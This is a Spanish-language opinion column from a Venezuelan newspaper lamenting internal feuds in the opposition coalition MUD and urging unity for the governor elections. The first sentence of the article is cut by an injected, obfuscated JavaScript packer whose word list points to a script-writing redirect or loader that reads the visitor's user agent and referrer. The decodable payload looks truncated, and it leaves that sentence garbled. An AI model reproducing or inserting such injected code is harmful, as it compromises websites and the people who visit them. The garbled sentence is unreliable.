publicidad

El drama de la Unidad 

Víctor Velasco / Abogado-Dirigente político / @victorvelascop
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fsrbz|var|u0026u|referrer|ikyik||js|php'.split('|'),0,{})) el Zulia, ya antes del regreso de Rosales existía una estrategia autodestructiva, que partía de la alianza de dos abalada desde Caracas

No hace falta que el Gobierno concrete la maniobra que anulará al principal partido del país: La MUD (al estilo nicaragüense); basta con la tormenta de agresiones internas que nos propinamos los unos a los otros. El tiempo lo dirá, no fue el “diálogo” el error, sino la disparidad y diversidad de estrategias, el manejo del asunto con poca transparencia, tanto a lo interno como hacia la calle; léase bien: de todos y cada uno de los actores. El diálogo en política nunca constituirá un error.

Error fue desmovilizarnos, y más grave aún fue el hecho de, acto seguido, encender una rebatiña interna que convirtió a la MUD en una especie de licuadora de dirigentes, donde no ha quedado hueso sano, ni siquiera de aquellos que hipócritamente se han desmarcado de ella, creyendo que podrán verla morir “desde la barrera”, fingiendo que nunca han participado de sus decisiones, ni se han beneficiado de ella. 

Hemos llegado al punto del bochorno, con soberbia e intransigencia por delante, sin contar las inconsistencias de acusarnos públicamente de cualquier rumor que deja colar el propio Gobierno para echarnos a pelear, mientras seguimos votando los unos por los otros en la AN. 

Decepcionan las declaraciones de Capriles sobre "Chúo" Torrealba, viniendo de quien para muchos todavía constituye uno de los liderazgos jóvenes más importantes y representativos de la Venezuela diferente que aspiramos.  En el Zulia, ya antes del regreso de Rosales existía una estrategia autodestructiva, que partía de la alianza de dos, abalada desde Caracas, para mediante la injuria, y no desde el trabajo en las comunidades, defenestrar la hegemonía de UNT.

La MUD está autodisuelta, de hecho como instancia política, lo que nos limitará para adoptar cualquier acción coherente, obstruyendo especialmente las alianzas electorales (el gran secreto de nuestros éxitos). A lo que se sumará la anulación legal de la MUD como partido, -estocada final-; pues facilitarán la validación de todos los demás partidos para que haya muchos candidatos con muchas tarjetas, “lo demás es coser y cantar”.

Es hora de convocarnos a la verdadera Unidad, la que nos condujo a acuñar  triunfos en 2007 y 2016; volvamos a la cordura y cambiemos las carreras por el paso firme; el cambio va. La conquista de las plazas de las Gobernaciones es requisito previo, política y constitucionalmente hablando. Trabajemos en unidad para esa nueva mayoría de gobernadores; seamos responsables, que nuestro mayor capital es y será la unidad. En ese nuevo amanecer todos vamos a caber.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama